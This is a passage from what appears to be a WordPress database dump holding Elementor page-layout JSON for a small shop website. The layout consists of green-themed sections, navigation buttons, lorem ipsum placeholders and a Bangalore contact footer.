:58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8086,1431,'_elementor_page_assets','a:0:{}'),(8088,1432,'_elementor_edit_mode','builder'),(8089,1432,'_elementor_template_type','wp-page'),(8090,1432,'_elementor_version','3.7.7'),(8091,1432,'_wp_page_template','elementor_canvas'),(8092,1432,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"04a298f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"30d54b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0303037A\",\"margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cce3d9f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"924390d\",\"elType\":\"widget\",\"settings\":{\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0e2e48f\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF8800\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"712d983\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"2a854a8\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#134019\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"5c71249\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#1B4121\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"7ce177e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#203E24\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST 